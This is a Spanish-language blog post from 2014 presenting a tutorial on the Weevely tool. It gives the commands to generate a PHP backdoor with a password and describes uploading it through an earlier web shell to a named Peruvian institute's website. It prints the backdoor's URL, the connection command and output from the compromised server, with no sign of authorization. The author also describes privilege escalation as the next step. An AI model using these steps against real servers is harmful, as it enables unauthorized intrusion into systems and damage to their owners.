HACKER ANGELWHITE GALC

martes, 6 de mayo de 2014

Usar Weevely

Hola amigos como verán este es mi primero post y primer Blog que he creado, en este post les vengo a enseñar como usar weevely.

¿Qué es weevely?

Weevely básicamente se usa para crear BackDoors en .PHP, esos backdoors se usan al subirlos a la web claro primeramente tendriamos que subir una Shell o no ahy problema si lo suben atravez de algún Upload e ir a la dirección de como llamaron el BackDoor, weevely se usa para rootear servidores pero en este caso ya qué no tengo la versión del Local Root Exploit osea la versión del Kernel de la Website no sería un rooteo, bueno comenzemos, mi web victima sería la de una univerdad de Perú.


Okey y como verán tuve que borrar el Link completo de la Shell para evitar problemas, básicamente el pentest se basa en legal y también ilegal.

¿Por qué Legal?

Por que tendriamos la autorización del administrador de la web y podriamos hacer ciertas cosas y publicar las vulnerabilidades (HUECO DE SEGURIDAD) esto se basa como un white hat.

¿Por qué ilegal?

Por qué esta vez no tendriamos la autorización del administrador y podriamos hacer lo uno quiera a la página web, desconfigurarla esto se basa a un defacement, borrar la base de datos,etc, muchas cosas más podriamos hacer, esto es basa a un Black Hat.

Okey ahora haremos lo siguiente abrimos la terminal ya que yo uso Kali Linux una distribución muy buena basada en Debian, okey la abrimos y ponemos lo siguiente, colocamos weevely y dariamos enter.


Okey como podrán ver al ejecutar la herramienta Weevely nos aparecera una ciertas instrucciones para crear el BackDoor programado en PHP, entonces haremos lo siguiente antes de nada el nombre del BackDoor lo nombrare como "WhiteHat.php" y la contraseña será "WhiteHat123", okey entonces pondriamos lo siguiente:

weevely generate WhiteHat123 /root/Desktop/WhiteHat.php

Okey y como verán el root/Desktop/WhiteHat es la ubicación del BackDoor, y dariamos enter y nos aparecera lo siguiente.


Okey nos apareceió lo siguiente:

[generate.php] Backdoor file '/root/Desktop/WhiteHat.php' created with password 'WhiteHat123'

Esto significa que se nos ha creado el BackDoor en el escritorio satisfactoriamente, okey ahora vamos a la shell y subamos el BackDoor, y bien !! se nos ha subido el BackDoor satisfactoriamente.


Okey como verán entonces se nos ha subido el BackDoor sin problemas en el Upload de la Shell, okey como verán ahora, iremos al Link del BackDoor , okey como escribi entonces el link del BackDoor sería el siguiente.

http://institutoabat.edu.pe/images/WhiteHat.php

No nos aparecera nada ya qué es Normal así son los BackDoors, e igualmente al crear un BackDoor en la vulnerabilidad de Windows 7 al ejecutar el BackDoor no nos aparecera nada se ejecuta y no abre nada es igúal, okey entonces vamos a la terminal y colocamos lo siguiente

weevely http://institutoabat.edu.pe/images/WhiteHat.php WhiteHat123

Otra cosa recuerden que como escribi antes el WhiteHat123 es la contraseña del BackDoor y dariamos enter entonces y nos aparecera lo siguiente


Y como verán ya estamos dentro del servidor, okey entonces colocariamos id y uname -a para ver la versión del Local Root Exploit osea la versión del Kernel.


Okey como verán esta esta es la id:

uid=1394(institut) gid=1382(institut) groups=1382(institut)

Está es la versión del Kernel del servidor:
Linux evop21.areserver.net 2.6.18-348.16.1.el5.028stab108.1 #1 SMP Tue Aug 27 13:02:53 MSD 2013 i686 i686 i386 GNU/Linux

Okey como verán la versión del Kernel no la tengo o si no les enseñaría en este mismo post a rootear un servidor, pero bueno, espero que hayan entendido y aquí les dejare el video que hice ayer.

Gracias a mi amigo  oswire punk por sus aportes

No hay comentarios:

Publicar un comentario